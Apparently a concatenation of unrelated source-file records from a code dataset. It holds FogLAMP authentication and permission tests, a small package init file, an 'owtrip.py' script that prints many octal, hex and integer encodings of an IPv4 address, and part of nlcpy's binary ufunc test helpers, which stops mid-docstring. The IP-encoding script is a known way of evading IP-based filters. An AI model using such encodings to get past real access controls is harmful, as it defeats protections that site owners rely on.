        assert 10 == jdoc['dataRead'], "data NOT seen in ping header"

    def test_ping_with_allow_ping_false(self):
        # Turning allowPing off must make the unauthenticated ping return 403.
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert "Logged in successfully" == jdoc['message']
        _token = jdoc["token"]
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"allowPing": "false"}),
                     headers={"authorization": _token})
        r = conn.getresponse()
        assert 200 == r.status
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("PUT", '/foglamp/logout', headers={"authorization": _token})
        r = conn.getresponse()
        assert 200 == r.status
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        assert 403 == r.status
        assert "Forbidden" == r.reason

    @pytest.mark.parametrize(("query", "expected_values"), [
        ('', {'users': [{'userId': 1, 'roleId': 1, 'userName': 'admin'},
                        {'userId': 2, 'roleId': 2, 'userName': 'user'}]}),
        ('?id=2', {'userId': 2, 'roleId': 2, 'userName': 'user'}),
        ('?username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
        ('?id=1&username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
    ])
    def test_get_users(self, query, expected_values):
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("GET", "/foglamp/user{}".format(query), headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert expected_values == jdoc

    def test_get_roles(self):
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("GET", "/foglamp/user/role", headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'roles': [{'description': 'All CRUD privileges', 'id': 1, 'name': 'admin'},
                          {'description': 'All CRUD operations and self profile management',
                           'id': 2, 'name': 'user'}]} == jdoc

    @pytest.mark.parametrize(("form_data", "expected_values"), [
        ({"username": "any1", "password": "User@123"}, {'user': {'userName': 'any1', 'userId': 3, 'roleId': 2},
                                                       'message': 'User has been created successfully'}),
        ({"username": "admin1", "password": "F0gl@mp!", "role_id": 1},
         {'user': {'userName': 'admin1', 'userId': 4, 'roleId': 1},
          'message': 'User has been created successfully'}),
    ])
    def test_create_user(self, form_data, expected_values):
        # New users get sequential ids (3, 4) consumed by reset/delete tests below.
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("POST", "/foglamp/admin/user", body=json.dumps(form_data),
                     headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert expected_values == jdoc

    def test_update_password(self):
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("PUT", "/foglamp/user/any1/password", body=json.dumps({"current_password": "User@123",
                                                                            "new_password": "F0gl@mp1"}),
                     headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'message': 'Password has been updated successfully for user id:<3>'} == jdoc

    def test_reset_user(self):
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("PUT", "/foglamp/admin/3/reset", body=json.dumps({"role_id": 1, "password": "F0gl@mp!"}),
                     headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'message': 'User with id:<3> has been updated successfully'} == jdoc

    def test_delete_user(self):
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("DELETE", "/foglamp/admin/4/delete", headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'message': "User has been deleted successfully"} == jdoc

    def test_logout_all(self):
        # Invalidate every session of user id 1.
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("PUT", '/foglamp/1/logout', headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert jdoc['logout']

    def test_verify_logout(self, foglamp_url):
        # The invalidated token must now be rejected.
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("GET", '/foglamp/asset', headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 401 == r.status

    def test_admin_actions_forbidden_for_regular_user(self):
        """Test that regular user is not able to perform any actions that only an admin can"""
        # Login with regular user
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/user.cert')
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert not jdoc['admin']
        _token = jdoc["token"]
        # Create User
        conn.request("POST", "/foglamp/admin/user", body=json.dumps({"username": "other",
                                                                     "password": "User@123"}),
                     headers={"authorization": _token})
        r = conn.getresponse()
        assert 403 == r.status
        r = r.read().decode()
        assert "403: Forbidden" == r
        # Reset User
        conn.request("PUT", "/foglamp/admin/2/reset", body=json.dumps({"role_id": 1, "password": "F0gl@p!"}),
                     headers={"authorization": _token})
        r = conn.getresponse()
        assert 403 == r.status
        r = r.read().decode()
        assert "403: Forbidden" == r
        # Delete User
        conn.request("DELETE", "/foglamp/admin/2/delete", headers={"authorization": _token})
        r = conn.getresponse()
        assert 403 == r.status
        r = r.read().decode()
        assert "403: Forbidden" == r

    @pytest.mark.skip(reason="Currently this feature is not implemented.")
    def test_regular_user_access_to_admin_api_config(self, foglamp_url):
        # Placeholder until the admin config API access restriction exists.
        pass
| 44.995905
| 119
| 0.598107
| 12,737
| 109,880
| 5.025438
| 0.026851
| 0.03712
| 0.053243
| 0.066678
| 0.965802
| 0.962599
| 0.958725
| 0.954553
| 0.951444
| 0.945461
| 0
| 0.019705
| 0.255488
| 109,880
| 2,441
| 120
| 45.014338
| 0.762734
| 0.022015
| 0
| 0.912579
| 0
| 0.004371
| 0.214258
| 0.021715
| 0
| 0
| 0
| 0.00041
| 0.222924
| 1
| 0.081107
| false
| 0.121904
| 0.003885
| 0
| 0.089849
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
809cde0ab6c581086f6c095c097798905d022e84
| 87
|
py
|
Python
|
python_schema/__init__.py
|
Drachenfels/python-schema
|
6eda318127e196729dd1b1de35318c4af26fa12c
|
[
"MIT"
] | 1
|
2018-09-25T13:31:35.000Z
|
2018-09-25T13:31:35.000Z
|
python_schema/__init__.py
|
Drachenfels/python-schema
|
6eda318127e196729dd1b1de35318c4af26fa12c
|
[
"MIT"
] | 10
|
2018-12-04T16:09:42.000Z
|
2019-10-29T17:23:48.000Z
|
python_schema/__init__.py
|
Drachenfels/python-schema
|
6eda318127e196729dd1b1de35318c4af26fa12c
|
[
"MIT"
] | null | null | null |
from . import misc # NOQA
from . import exception # NOQA
from . import field # NOQA
| 21.75
| 31
| 0.689655
| 12
| 87
| 5
| 0.5
| 0.5
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.241379
| 87
| 3
| 32
| 29
| 0.909091
| 0.16092
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
80a86b12cdd0144a5c24a9e66d98139c767baa0d
| 4,775
|
py
|
Python
|
owtrip.py
|
mammamiiiya/turbo-adventure
|
a3ba12d29e105e19330676c0e95079af6123354b
|
[
"MIT"
] | null | null | null |
owtrip.py
|
mammamiiiya/turbo-adventure
|
a3ba12d29e105e19330676c0e95079af6123354b
|
[
"MIT"
] | null | null | null |
owtrip.py
|
mammamiiiya/turbo-adventure
|
a3ba12d29e105e19330676c0e95079af6123354b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import argparse, re
def alternatives(ip):
    """Print the many equivalent textual spellings of an IPv4 address.

    For every dotted-quad found in *ip*, emits 27 alternative encodings:
    partially folded dotted forms, plain/hex/octal integer forms, and
    mixed-base dotted forms (as accepted by many IP parsers).
    """
    print('Other ways to write {} are listed below:\n'.format(ip))
    for match in re.finditer(r'((?P<a>\d+)\.)((?P<b>\d+)\.)((?P<c>\d+)\.)(?P<d>\d+)', ip):
        # Keep both the raw octet strings and their integer values.
        sa, sb, sc, sd = match.group('a'), match.group('b'), match.group('c'), match.group('d')
        a, b, c, d = int(sa), int(sb), int(sc), int(sd)

        def hx(v):
            # hexadecimal spelling, e.g. 0xc0
            return hex(v)

        def oc(v):
            # octal spelling with the 'o' stripped, e.g. 0o17 -> 017
            return oct(v).replace('o', '')

        cd = c * 256 + d            # last two octets folded into one integer
        bcd = b * 256 ** 2 + cd     # last three octets folded
        abcd = a * 256 ** 3 + bcd   # whole address as a single integer

        print('{}.{}'.format(a, bcd))
        print('{}.{}.{}'.format(a, b, cd))
        print('.'.join([sa, hx(b), hx(c), hx(d)]))
        print('.'.join([sa, sb, hx(c), hx(d)]))
        print('.'.join([sa, sb, sc, hx(d)]))
        print('.'.join([sa, oc(b), oc(c), oc(d)]))
        print('.'.join([sa, sb, oc(c), oc(d)]))
        print('.'.join([sa, sb, sc, oc(d)]))
        print(abcd)
        print(hex(abcd))
        print('{}.{}.{}'.format(hx(a), oc(b), cd))
        print('.'.join([hx(a), hx(b), hx(c), hx(d)]))
        print('.'.join([hx(a), hx(b), hx(c), sd]))
        print('.'.join([hx(a), hx(b), sc, sd]))
        print('.'.join([hx(a), sb, sc, sd]))
        print('{}.{}.{}'.format(hx(a), hx(b), cd))
        print('{}.{}'.format(hx(a), bcd))
        # zero-padded hex octets, e.g. 0x000000001
        print('.'.join(hex(v).replace('x', 'x00000000') for v in (a, b, c, d)))
        print(oc(abcd))
        print('.'.join([oc(a), oc(b), oc(c), oc(d)]))
        print('.'.join([oc(a), oc(b), oc(c), sd]))
        print('.'.join([oc(a), oc(b), sc, sd]))
        print('.'.join([oc(a), sb, sc, sd]))
        print('{}.{}.{}'.format(oc(a), oc(b), cd))
        print('{}.{}'.format(oc(a), bcd))
        print('{}.{}.{}'.format(oc(a), hx(b), cd))
        # zero-padded octal octets, e.g. 000000001
        print('.'.join(oct(v).replace('o', '0000000') for v in (a, b, c, d)))
if __name__ == '__main__':
    # CLI entry point: -i <ipv4> prints the alternative encodings,
    # otherwise show usage.
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('-i', dest='ip', help='Valid IPv4 Address (e.g. \'192.168.56.101\')')
    parsed = arg_parser.parse_args()
    if not parsed.ip:
        arg_parser.print_help()
    else:
        alternatives(parsed.ip)
| 68.214286
| 191
| 0.546178
| 700
| 4,775
| 3.71
| 0.092857
| 0.499037
| 0.485175
| 0.180208
| 0.882172
| 0.882172
| 0.882172
| 0.882172
| 0.879861
| 0.879861
| 0
| 0.023068
| 0.119372
| 4,775
| 69
| 192
| 69.202899
| 0.59453
| 0.004398
| 0
| 0
| 0
| 0.025641
| 0.069851
| 0.01094
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025641
| false
| 0
| 0.025641
| 0
| 0.051282
| 0.74359
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
80ceee5cd5d0f039f4197ac6d1faf09ae371ec4c
| 23,389
|
py
|
Python
|
nlcpy/testing/binary.py
|
SX-Aurora/nlcpy
|
0a53eec8778073bc48b12687b7ce37ab2bf2b7e0
|
[
"BSD-3-Clause"
] | 11
|
2020-07-31T02:21:55.000Z
|
2022-03-10T03:12:11.000Z
|
nlcpy/testing/binary.py
|
SX-Aurora/nlcpy
|
0a53eec8778073bc48b12687b7ce37ab2bf2b7e0
|
[
"BSD-3-Clause"
] | null | null | null |
nlcpy/testing/binary.py
|
SX-Aurora/nlcpy
|
0a53eec8778073bc48b12687b7ce37ab2bf2b7e0
|
[
"BSD-3-Clause"
] | null | null | null |
#
# * The source code in this file is developed independently by NEC Corporation.
#
# # NLCPy License #
#
# Copyright (c) 2020-2021 NEC Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither NEC Corporation nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import absolute_import
from __future__ import print_function
import numpy
import itertools
from nlcpy.testing import ufunc
def _recreate_array_or_scalar(op, in1, in2):
if op in ('divide', 'true_divide', 'remainder', 'mod', 'floor_divide'):
if isinstance(in2, numpy.ndarray):
in2[abs(in2) < 1] = 1
else:
in2 = 1 if abs(in2) < 1 else in2
elif op in ('power'):
if isinstance(in1, numpy.ndarray):
in1[in1 > 5] = 5
in1[in1 < -5] = -5
else:
in1 = 5 if in1.real > 5 else in1.real
in1 = -5 if in1.real < 5 else in1.real
if isinstance(in2, numpy.ndarray):
in2[in2 > 5] = 5
# TODO: valid minus value
in2[in2 <= 0] = 1
else:
in2 = 5 if in2.real > 5 else in2.real
# TODO: valid minus value
in2 = 1 if in2.real <= 0 else in2.real
elif op in ('right_shift', 'left_shift'):
if isinstance(in2, numpy.ndarray):
in2[in2 > 31] = 31
in2[in2 < 0] = 0
else:
in2 = 31 if in2.real > 31 else in2
in2 = 0 if in2.real < 0 else in2
elif op == 'ldexp':
if isinstance(in2, numpy.ndarray):
in2[in2 > 15] = 15
else:
in2 = 15 if in2.real > 15 else in2
return in1, in2
def _create_out_array(in1, in2, order, dtype, ufunc_name='', is_broadcast=False):
if ufunc_name == 'outer':
shape = numpy.asarray(in1).shape + numpy.asarray(in2).shape
else:
shape = numpy.broadcast(in1, in2).shape
# expand shape for broadcast
if is_broadcast:
shape = (2,) + shape
return numpy.zeros(shape, dtype=dtype, order=order)
def _check_binary_no_out_no_where_no_dtype(
        self, args, kw, impl, name_xp, name_in1, name_in2, name_order, name_casting,
        op, minval, maxval, shape, order_x, order_y, order_arg,
        dtype_x, dtype_y, mode, ufunc_name, casting):
    """Compare nlcpy vs numpy for binary ufunc *op* without out/where/dtype.

    Iterates the cartesian product of the shape/order/dtype/casting axes
    (which axes apply depends on *mode*: 'array_array', 'array_scalar' or
    'scalar_scalar'), builds random operands clamped to a valid range for
    *op*, injects them into ``kw`` and runs the test body through
    ``ufunc._precheck_func_for_ufunc``; results are then verified with
    ``ufunc._check_ufunc_result``.  Raises TypeError for an unknown *mode*.
    """
    if mode == 'array_array':
        # p = ((shape1, shape2), order_x, order_y, dtype_x, dtype_y,
        #      order_arg, casting)
        param = itertools.product(
            shape, order_x, order_y, dtype_x, dtype_y, order_arg, casting)
    elif mode == 'array_scalar':
        # p = ((shape1, _), order_x, dtype_x, dtype_y, order_arg, casting)
        param = itertools.product(
            shape, order_x, dtype_x, dtype_y, order_arg, casting)
    elif mode == 'scalar_scalar':
        # p = (dtype_x, dtype_y, casting)
        param = itertools.product(dtype_x, dtype_y, casting)
    else:
        raise TypeError('unknown mode was detected.')
    for p in param:
        if mode == 'array_array':
            shape1 = p[0][0]
            shape2 = p[0][1]
            order = p[5]
            casting = p[6]
            in1 = ufunc._create_random_array(shape1, p[1], p[3], minval, maxval)
            in2 = ufunc._create_random_array(shape2, p[2], p[4], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            worst_dtype = ufunc._guess_worst_dtype((in1.dtype, in2.dtype))
        elif mode == 'array_scalar':
            shape1 = p[0][0]
            order = p[4]
            casting = p[5]
            in1 = ufunc._create_random_array(shape1, p[1], p[2], minval, maxval)
            in2 = ufunc._create_random_scalar(p[3], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            dt_in2 = numpy.dtype(p[3])
            worst_dtype = ufunc._guess_worst_dtype((in1.dtype, dt_in2))
        elif mode == 'scalar_scalar':
            casting = p[2]
            order = 'K'
            in1 = ufunc._create_random_scalar(p[0], minval, maxval)
            in2 = ufunc._create_random_scalar(p[1], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            dt_in1 = numpy.dtype(p[0])
            dt_in2 = numpy.dtype(p[1])
            worst_dtype = ufunc._guess_worst_dtype((dt_in1, dt_in2))
        kw[name_in1] = in1
        kw[name_in2] = in2
        # order/casting keyword arguments are only passed for <ufunc>.outer
        if ufunc_name == 'outer':
            kw[name_order] = order
            kw[name_casting] = casting
        nlcpy_result, numpy_result = ufunc._precheck_func_for_ufunc(
            self, args, kw, impl, name_xp, op, True, Exception)
        # result check (only when both sides produced a result)
        if nlcpy_result is not None and numpy_result is not None:
            for nlcpy_r, numpy_r in zip(nlcpy_result, numpy_result):
                ufunc._check_ufunc_result(
                    op, worst_dtype, nlcpy_r, numpy_r, in1=in1, in2=in2)
def _check_binary_no_out_no_where_with_dtype(
        self, args, kw, impl, name_xp, name_in1, name_in2, name_order, name_casting,
        name_dtype, op, minval, maxval, shape, order_x, order_y, order_arg, dtype_x,
        dtype_y, dtype_arg, mode, ufunc_name, casting):
    """Compare nlcpy vs numpy for binary ufunc *op* with an explicit ``dtype``.

    Same parameter sweep as ``_check_binary_no_out_no_where_no_dtype`` but
    additionally iterates *dtype_arg* and passes the selected dtype through
    ``kw[name_dtype]``; the dtype also participates in the worst-dtype guess
    used for tolerance selection.  Raises TypeError for an unknown *mode*.
    """
    if mode == 'array_array':
        # p = ((shape1, shape2), order_x, order_y, dtype_x, dtype_y,
        #      dtype_arg, order_arg, casting)
        param = itertools.product(
            shape, order_x, order_y, dtype_x, dtype_y, dtype_arg, order_arg, casting)
    elif mode == 'array_scalar':
        # p = ((shape1, _), order_x, dtype_x, dtype_y, dtype_arg,
        #      order_arg, casting)
        param = itertools.product(
            shape, order_x, dtype_x, dtype_y, dtype_arg, order_arg, casting)
    elif mode == 'scalar_scalar':
        # p = (dtype_x, dtype_y, dtype_arg, casting)
        param = itertools.product(dtype_x, dtype_y, dtype_arg, casting)
    else:
        raise TypeError('unknown mode was detected.')
    for p in param:
        if mode == 'array_array':
            shape1 = p[0][0]
            shape2 = p[0][1]
            order = p[6]
            casting = p[7]
            in1 = ufunc._create_random_array(shape1, p[1], p[3], minval, maxval)
            in2 = ufunc._create_random_array(shape2, p[2], p[4], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            dtype = numpy.dtype(p[5])
            worst_dtype = ufunc._guess_worst_dtype((in1.dtype, in2.dtype, dtype))
        elif mode == 'array_scalar':
            shape1 = p[0][0]
            order = p[5]
            casting = p[6]
            in1 = ufunc._create_random_array(shape1, p[1], p[2], minval, maxval)
            in2 = ufunc._create_random_scalar(p[3], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            dt_in2 = numpy.dtype(p[3])
            dtype = numpy.dtype(p[4])
            worst_dtype = ufunc._guess_worst_dtype((in1.dtype, dt_in2, dtype))
        elif mode == 'scalar_scalar':
            order = 'K'
            casting = p[3]
            in1 = ufunc._create_random_scalar(p[0], minval, maxval)
            in2 = ufunc._create_random_scalar(p[1], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            dt_in1 = numpy.dtype(p[0])
            dt_in2 = numpy.dtype(p[1])
            dtype = numpy.dtype(p[2])
            worst_dtype = ufunc._guess_worst_dtype((dt_in1, dt_in2, dtype))
        kw[name_in1] = in1
        kw[name_in2] = in2
        kw[name_dtype] = dtype
        # order/casting keyword arguments are only passed for <ufunc>.outer
        if ufunc_name == 'outer':
            kw[name_order] = order
            kw[name_casting] = casting
        nlcpy_result, numpy_result = ufunc._precheck_func_for_ufunc(
            self, args, kw, impl, name_xp, op, True, Exception)
        # result check (only when both sides produced a result)
        if nlcpy_result is not None and numpy_result is not None:
            for nlcpy_r, numpy_r in zip(nlcpy_result, numpy_result):
                ufunc._check_ufunc_result(
                    op, worst_dtype, nlcpy_r, numpy_r, in1=in1, in2=in2,
                    dtype=dtype)
def _check_binary_with_out_no_where_no_dtype(
        self, args, kw, impl, name_xp, name_in1, name_in2, name_order, name_casting,
        name_out, op, minval, maxval, shape, order_x, order_y, order_out, order_arg,
        dtype_x, dtype_y, dtype_out, mode, is_broadcast, ufunc_name, casting):
    """Compare nlcpy vs numpy for binary ufunc *op* with an ``out`` array.

    Extends the no-out sweep with *order_out*/*dtype_out* axes; a zero-filled
    ``out`` array shaped by ``_create_out_array`` is passed via
    ``kw[name_out]`` (with a leading broadcast axis when *is_broadcast*).
    The out dtype participates in the worst-dtype guess.  Raises TypeError
    for an unknown *mode*.
    """
    if mode == 'array_array':
        # p = ((shape1, shape2), order_x, order_y, order_out,
        #      dtype_x, dtype_y, dtype_out, order_arg, casting)
        param = itertools.product(
            shape, order_x, order_y, order_out,
            dtype_x, dtype_y, dtype_out, order_arg, casting)
    elif mode == 'array_scalar':
        # p = ((shape1, _), order_x, order_out, dtype_x, dtype_y,
        #      dtype_out, order_arg, casting)
        param = itertools.product(
            shape, order_x, order_out, dtype_x,
            dtype_y, dtype_out, order_arg, casting)
    elif mode == 'scalar_scalar':
        # p = (order_out, dtype_x, dtype_y, dtype_out, casting)
        param = itertools.product(
            order_out, dtype_x, dtype_y, dtype_out, casting)
    else:
        raise TypeError('unknown mode was detected.')
    for p in param:
        if mode == 'array_array':
            shape1 = p[0][0]
            shape2 = p[0][1]
            order = p[7]
            casting = p[8]
            in1 = ufunc._create_random_array(shape1, p[1], p[4], minval, maxval)
            in2 = ufunc._create_random_array(shape2, p[2], p[5], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            out = _create_out_array(in1, in2, p[3], p[6], ufunc_name, is_broadcast)
            worst_dtype = ufunc._guess_worst_dtype((in1.dtype, in2.dtype, out.dtype))
        elif mode == 'array_scalar':
            shape1 = p[0][0]
            order = p[6]
            casting = p[7]
            in1 = ufunc._create_random_array(shape1, p[1], p[3], minval, maxval)
            in2 = ufunc._create_random_scalar(p[4], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            out = _create_out_array(in1, in2, p[2], p[5], ufunc_name, is_broadcast)
            dt_in2 = numpy.dtype(p[4])
            worst_dtype = ufunc._guess_worst_dtype((in1.dtype, dt_in2, out.dtype))
        elif mode == 'scalar_scalar':
            order = 'K'
            casting = p[4]
            in1 = ufunc._create_random_scalar(p[1], minval, maxval)
            in2 = ufunc._create_random_scalar(p[2], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            out = _create_out_array(in1, in2, p[0], p[3], ufunc_name, is_broadcast)
            dt_in1 = numpy.dtype(p[1])
            dt_in2 = numpy.dtype(p[2])
            worst_dtype = ufunc._guess_worst_dtype((dt_in1, dt_in2, out.dtype))
        kw[name_in1] = in1
        kw[name_in2] = in2
        kw[name_out] = out
        # order/casting keyword arguments are only passed for <ufunc>.outer
        if ufunc_name == 'outer':
            kw[name_order] = order
            kw[name_casting] = casting
        nlcpy_result, numpy_result = ufunc._precheck_func_for_ufunc(
            self, args, kw, impl, name_xp, op, True, Exception)
        # result check (only when both sides produced a result)
        if nlcpy_result is not None and numpy_result is not None:
            for nlcpy_r, numpy_r in zip(nlcpy_result, numpy_result):
                ufunc._check_ufunc_result(
                    op, worst_dtype, nlcpy_r, numpy_r, in1=in1, in2=in2,
                    out=out)
def _check_binary_with_out_no_where_with_dtype(
        self, args, kw, impl, name_xp, name_in1, name_in2, name_order,
        name_casting, name_out, name_dtype, op, minval, maxval, shape, order_x,
        order_y, order_out, order_arg, dtype_x, dtype_y, dtype_out, dtype_arg,
        mode, ufunc_name, casting):
    """Compare nlcpy vs numpy for binary ufunc *op* with ``out`` and ``dtype``.

    Combines the ``out`` sweep with an explicit *dtype_arg* axis; both the
    out dtype and the requested dtype participate in the worst-dtype guess.
    No broadcast axis is added to ``out`` in this variant.  Raises TypeError
    for an unknown *mode*.
    """
    if mode == 'array_array':
        # p = ((shape1, shape2), order_x, order_y, order_out, dtype_x,
        #      dtype_y, dtype_out, dtype_arg, order_arg, casting)
        param = itertools.product(
            shape, order_x, order_y, order_out, dtype_x, dtype_y,
            dtype_out, dtype_arg, order_arg, casting)
    elif mode == 'array_scalar':
        # p = ((shape1, _), order_x, order_out, dtype_x, dtype_y,
        #      dtype_out, dtype_arg, order_arg, casting)
        param = itertools.product(
            shape, order_x, order_out, dtype_x, dtype_y, dtype_out,
            dtype_arg, order_arg, casting)
    elif mode == 'scalar_scalar':
        # p = (order_out, dtype_x, dtype_y, dtype_out, dtype_arg, casting)
        param = itertools.product(
            order_out, dtype_x, dtype_y, dtype_out, dtype_arg, casting)
    else:
        raise TypeError('unknown mode was detected.')
    for p in param:
        if mode == 'array_array':
            shape1 = p[0][0]
            shape2 = p[0][1]
            order = p[8]
            casting = p[9]
            in1 = ufunc._create_random_array(shape1, p[1], p[4], minval, maxval)
            in2 = ufunc._create_random_array(shape2, p[2], p[5], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            out = _create_out_array(in1, in2, p[3], p[6], ufunc_name)
            dtype = numpy.dtype(p[7])
            worst_dtype = ufunc._guess_worst_dtype(
                (in1.dtype, in2.dtype, out.dtype, dtype))
        elif mode == 'array_scalar':
            shape1 = p[0][0]
            order = p[7]
            casting = p[8]
            in1 = ufunc._create_random_array(shape1, p[1], p[3], minval, maxval)
            in2 = ufunc._create_random_scalar(p[4], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            out = _create_out_array(in1, in2, p[2], p[5], ufunc_name)
            dt_in2 = numpy.dtype(p[4])
            dtype = numpy.dtype(p[6])
            worst_dtype = ufunc._guess_worst_dtype(
                (in1.dtype, dt_in2, out.dtype, dtype))
        elif mode == 'scalar_scalar':
            order = 'K'
            casting = p[5]
            in1 = ufunc._create_random_scalar(p[1], minval, maxval)
            in2 = ufunc._create_random_scalar(p[2], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            out = _create_out_array(in1, in2, p[0], p[3], ufunc_name)
            dt_in1 = numpy.dtype(p[1])
            dt_in2 = numpy.dtype(p[2])
            dtype = numpy.dtype(p[4])
            worst_dtype = ufunc._guess_worst_dtype(
                (dt_in1, dt_in2, out.dtype, dtype))
        kw[name_in1] = in1
        kw[name_in2] = in2
        kw[name_out] = out
        kw[name_dtype] = dtype
        # order/casting keyword arguments are only passed for <ufunc>.outer
        if ufunc_name == 'outer':
            kw[name_order] = order
            kw[name_casting] = casting
        nlcpy_result, numpy_result = ufunc._precheck_func_for_ufunc(
            self, args, kw, impl, name_xp, op, True, Exception)
        # result check (only when both sides produced a result)
        if nlcpy_result is not None and numpy_result is not None:
            for nlcpy_r, numpy_r in zip(nlcpy_result, numpy_result):
                ufunc._check_ufunc_result(
                    op, worst_dtype, nlcpy_r, numpy_r, in1=in1, in2=in2,
                    out=out, dtype=dtype)
def _check_binary_with_out_with_where_no_dtype(
        self, args, kw, impl, name_xp, name_in1, name_in2, name_order,
        name_casting, name_out, name_where, op, minval, maxval, shape,
        order_x, order_y, order_out, order_where, order_arg, dtype_x,
        dtype_y, dtype_out, mode, is_broadcast, ufunc_name, casting):
    """Compare nlcpy vs numpy for binary ufunc *op* with ``out`` and ``where``.

    Extends the ``out`` sweep with an *order_where* axis: a random boolean
    mask matching ``out``'s shape is generated and passed through
